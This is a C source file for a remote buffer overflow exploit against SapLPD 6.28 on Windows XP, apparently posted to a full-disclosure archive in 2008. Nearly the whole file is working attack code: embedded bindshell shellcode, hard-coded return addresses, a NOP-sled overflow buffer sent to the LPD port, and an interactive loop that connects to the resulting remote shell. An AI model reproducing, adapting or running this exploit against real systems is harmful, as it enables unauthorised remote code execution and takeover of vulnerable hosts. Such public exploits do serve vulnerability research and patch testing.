saplpd-overflow.txt

`/*  
http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060042.html  
  
Exploit for SapLPD 6.28 Win32 by BackBone  
Tested with SapLPD 6.28 on Windows XP SP2  
  
Groetjes aan mijn sletjes Ops,Doop,Gabber,head,ps,sj,dd en de rest!  
*/  
  
#include <stdio.h>  
#include <winsock2.h>  
#include <windows.h>  
#pragma comment (lib,"ws2_32")  
  
#define DEFAULT_PORT 515  
  
char ASCII_SHIT[]=  
"\r\n"  
"\t\t ______ ______\r\n"   
"\t\t (, / ) /) (, / )\r\n"  
"\t\t /---( _ _ (/_ /---( _____ _\r\n"   
"\t\t ) / ____)(_(_(__/(__) / ____)(_) / (__(/_\r\n"  
"\t\t(_/ ( (_/ ( (c) 2008\r\n"  
"\r\n";  
  
struct  
{  
LPSTR lpVersion;  
DWORD dwOffset;  
DWORD dwRetAddr;  
BYTE bLPDCmd;  
}  
targets[]=  
{  
// exploit works with cmd 0x01,0x02,0x03,...  
{"SAPLPD Version 6.28 for Windows/NT (TEST)",484,0x0012F0A1,0x01}, // addr of shellcode -> 0x0012F0A1  
{"SAPLPD Version 6.28 for Windows/NT",484,0x004E0BB7,0x01}, // jmp esp 0x004E0BB7 -> SAPLpd.exe 6.28  
},v;  
  
  
// don't change the offset  
#define PORT_OFFSET 170  
#define BIND_PORT 10282  
  
// bindshell shellcode from www.metasploit.com,mod by skylined  
unsigned char shellcode[] =  
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"  
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"  
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"  
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"  
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"  
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"  
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"  
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"  
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"  
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"  
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"  
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"  
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"  
"\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"  
"\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"  
"\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"  
"\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"  
"\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"  
"\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"  
"\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"  
"\x83\xc4\x5c\x61\xeb\x89";  
  
#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);  
  
BOOL StartupWinsock(void)  
{  
WSADATA wsa;  
  
return !WSAStartup(MAKEWORD(2,0),&wsa);  
}  
  
DWORD LookupAddress(LPSTR lpHost)  
{  
DWORD dwRemoteAddr=inet_addr(lpHost);  
  
if (dwRemoteAddr==INADDR_NONE)  
{  
struct hostent* pHostEnt=gethostbyname(lpHost);  
if (pHostEnt==0)  
return INADDR_NONE;  
dwRemoteAddr = *((DWORD*)pHostEnt->h_addr_list[0]);  
}  
  
return dwRemoteAddr;  
}  
  
SOCKET TCPConnect(DWORD dwIP,WORD wPort,DWORD dwTimeout)  
{  
struct sockaddr_in sock_in;  
struct timeval timeout;  
DWORD fdWrite[2];  
DWORD fdExcept[2];  
SOCKET s;  
int slResult;  
int val=1,len=sizeof(int);  
  
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  
if (s==INVALID_SOCKET)  
return SOCKET_ERROR;  
  
ioctlsocket(s,FIONBIO,(u_long*)&val);  
  
fdWrite[0]=fdExcept[0]=1;  
fdWrite[1]=fdExcept[1]=s;  
  
memset(&sock_in,0,sizeof(sock_in));  
sock_in.sin_port=wPort;  
sock_in.sin_family=AF_INET;  
sock_in.sin_addr.s_addr=dwIP;  
  
connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in));  
  
timeout.tv_sec=dwTimeout/1000;  
timeout.tv_usec=dwTimeout%1000;  
  
slResult=select(0,NULL,(fd_set*)&fdWrite,(fd_set*)&fdExcept,&timeout);  
switch(slResult)  
{  
case -1:  
case 0:  
{  
closesocket(s);  
return SOCKET_ERROR;  
}  
  
default:  
{  
if (!FD_ISSET(s,(fd_set*)&fdExcept))   
{  
val=0;ioctlsocket(s,FIONBIO,(u_long*)&val);  
return s;  
}  
break;  
}  
}  
  
closesocket(s);  
return SOCKET_ERROR;  
}  
  
/* ripped from TESO code and modifed by ey4s for win32 */  
void Shell(int s)  
{  
int l;  
char buf[512];  
struct timeval time;  
unsigned long ul[2];  
  
time.tv_sec=1;  
time.tv_usec=0;  
  
while(1)  
{  
ul[0]=1;  
ul[1]=s;  
  
l=select(0,(fd_set*)&ul,NULL,NULL,&time);  
if(l==1)  
{  
l=recv(s,buf,sizeof(buf),0);  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
l=write(1,buf,l);  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
}  
else  
{  
l=read(0,buf,sizeof(buf));  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
l=send(s,buf,l,0);  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
}  
}  
}  
  
void ShowBanner(void)  
{  
printf("%s",ASCII_SHIT);  
}  
  
void ShowSploit(void)  
{  
printf("\t\tSAPlpd 6.28 Multiple Remote Buffer Overflows\r\n");  
printf("\t\t Advisory by Luigi Auriemma\r\n");  
printf("\t\t Exploit By BackBone\r\n");  
printf("\r\n");  
}  
  
void ShowUsage(char* argv)  
{  
int i;  
  
printf("[*] %s host/ip[:port] target [bindport]\r\n",argv);  
printf("[*] Default port: %d - Default bindport: %d\r\n",DEFAULT_PORT,BIND_PORT);  
printf("[*] Target(s):\r\n\r\n");  
for (i=0;i<(sizeof(targets)/sizeof(v));i++)  
printf("\t%2d: %s (0x%08x)\r\n",i,targets[i].lpVersion,targets[i].dwRetAddr);  
}  
  
int main(int argc, char* argv[])  
{  
LPSTR lpHost,lpPort;  
ULONG ulIP;  
USHORT usPort;  
USHORT usBindPort;  
SOCKET sSock;  
int iTarget;  
int iLen=0;  
char lpBuffer[16384];  
  
ShowBanner();  
ShowSploit();  
  
// check arguments  
if (argc<3||argc>4)  
{  
ShowUsage(argv[0]);  
return -1;  
}  
  
// get host/ip  
lpHost=strtok(argv[1],":");  
// get port  
lpPort=strtok(NULL,":");  
if (lpPort) usPort=(USHORT)atoi(lpPort);  
else usPort=DEFAULT_PORT;  
  
// startup winsock  
if (!StartupWinsock())  
{  
printf("[-] WSAStartup() Failed.\r\n");  
return -1;  
}  
  
// resolve host  
ulIP=LookupAddress(lpHost);  
if (ulIP==INADDR_NONE)  
{  
printf("[-] Invalid IP/Host.\r\n");  
WSACleanup();  
return -1;  
}  
  
// get target   
iTarget=atoi(argv[2]);  
if (iTarget<0||iTarget>(sizeof(targets)/sizeof(v))-1)  
{  
printf("[-] Invalid target.\r\n");  
WSACleanup();  
return -1;  
}  
  
printf("[+] Target: %s (0x%08x)\r\n",targets[iTarget].lpVersion,targets[iTarget].dwRetAddr);  
  
if (argc==4) usBindPort=(USHORT)atoi(argv[3]);  
else usBindPort=BIND_PORT;  
SET_BIND_PORT(usBindPort);  
  
// connecting  
printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF,  
(ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usPort);  
  
// connect  
sSock=TCPConnect(ulIP,htons(usPort),10000);  
if (sSock==SOCKET_ERROR)  
{  
printf("Failed!\r\n");  
WSACleanup();  
return -1;  
}  
  
printf("Ok.\r\n");  
  
// construct buffer  
memset(lpBuffer,0,sizeof(lpBuffer));  
  
*lpBuffer=targets[iTarget].bLPDCmd;  
iLen+=1;  
  
memset(lpBuffer+iLen,0x90,targets[iTarget].dwOffset-sizeof(shellcode));  
iLen+=targets[iTarget].dwOffset-sizeof(shellcode);  
  
memcpy(lpBuffer+iLen,shellcode,sizeof(shellcode));  
iLen+=sizeof(shellcode);  
  
memcpy(lpBuffer+iLen,&targets[iTarget].dwRetAddr,4);  
iLen+=4;   
  
memcpy(lpBuffer+iLen,"\xE9\x98\x08\x00\x00",5); // jmp esp will execute this code, jmp to shellcode  
iLen+=5;  
  
memset(lpBuffer+iLen,0x41,1);// saplpd zeroes this byte  
iLen+=1;  
  
printf("[+] Sending buffer (size:%d) ... ",iLen);  
  
// send buffer  
if (send(sSock,lpBuffer,iLen,0)<=0)  
{  
printf("Failed!\r\n");  
WSACleanup();  
return -1;  
}  
  
printf("Ok.\r\n");  
  
closesocket(sSock);  
  
Sleep(1000);  
  
// connecting  
printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF,  
(ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usBindPort);  
  
// connect to bindshell  
sSock=TCPConnect(ulIP,htons(usBindPort),10000);  
if (sSock==SOCKET_ERROR)  
{  
printf("Failed!\r\n");  
WSACleanup();  
return -1;  
}  
  
printf("Ok.\r\n\r\n");  
  
// shell  
Shell(sSock);  
  
closesocket(sSock);  
  
WSACleanup();  
  
return 0;  
}  
`